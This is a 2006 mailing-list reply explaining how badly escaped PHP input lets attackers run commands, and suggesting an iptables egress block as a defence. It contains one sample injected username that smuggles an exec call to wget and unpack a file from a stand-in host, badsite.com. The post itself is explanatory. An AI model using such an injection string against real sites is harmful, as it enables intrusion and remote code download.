[CS-FSLUG] PHP vulnerabilities?

Tim Young Tim.Young at LightSys.org
Fri Jun 2 08:42:15 CDT 2006

There are quite a number of ways to do this sort of thing.  Most of the 
time it is a poorly written PHP (or other language) script.  The basic 
thing is when you give someone the ability to input something.  For 
example, a username.

Instead of having a username "Tim", they use something like:
    "Tim; \"exec('wget http://badsite.com/badfile.tgz; tar -xzf 

If whoever wrote the php program did not properly escape the variables 
on the way in, there is a decent chance that the variable will be used 
in some context where it will be executed.

The reason such things occur is because most people, when they are 
programming PHP, do not read up on PHP security (from the PHP online 
docs).  They have some really good information in the contributed 
portions of the documentation.

No matter how well you lock down the server itself, if the code you run 
on the server is poorly written, it can still be compromised.  :)

There are a few good ways to thwart this sort of behavior.  A very 
simple way, if you cannot program PHP securely, is to use iptables to 
disallow outgoing connections from being originated from the server 
itself (only allow response packets.)  Then someone would need to 
compromise root to gain the permission to remove your iptables before 
they can download files...

    - Tim Young

Ps.  The code I gave was a non-functional example.  It is close to what 
would be used, though it should not work breaking into anything.  If you 
want to have real-life examples that do work, read the PHP security pages.

Ed Hurst wrote:
> Legatus wrote:
>> of folks. The file probably doesn't exist. It is probably a embedded in 
>> a PHP script, and the query string calls a function that then generates 
>> the the file for download. The offending file was probably injected 
>> using a buffer overflow or other vulnerability in PHP, or by accessing 
>> another site on the same server that has a flaky file upload script, 
>> that will allow people to add a full path the the file they are 
>> uploading, thus putting the file exactly where they want. There are 
>> probably a hundred other ways to do this.
> So this is likely generated by a script? Obviously I know nothing of
> PHP, aside from reading about vulnerabilities. I'm guessing a standard
> script is replaced by the cracker, which adds this extra capability
> undetected, eh?

More information about the Christiansource mailing list